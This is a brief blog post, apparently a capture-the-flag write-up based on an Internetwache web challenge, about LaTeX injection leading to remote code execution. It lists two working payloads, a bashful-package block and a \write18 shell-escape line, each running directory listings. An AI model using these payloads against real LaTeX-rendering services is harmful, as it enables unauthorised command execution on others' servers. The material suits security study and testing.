If you like to read our old blogs you are welcome, I4INFO
Based on web90 problem in Internetwache, I going discuss the latex vulnerability. Usually in websites using latex, you can easily get an remote code execution. I would list all the payload which may lead you to an rce.
You may get an rce, but somemay may be sandboxed, so you can term it as bug
Payload 1
\documentclass{article}
\usepackage[a6paper]{geometry}
\usepackage{bashful}
\begin{document}
\bash[script,stdout]
ls
\END
\end{document}
Payload 2
\immediate\write18{ls -la / }
Thank you for reading the blog!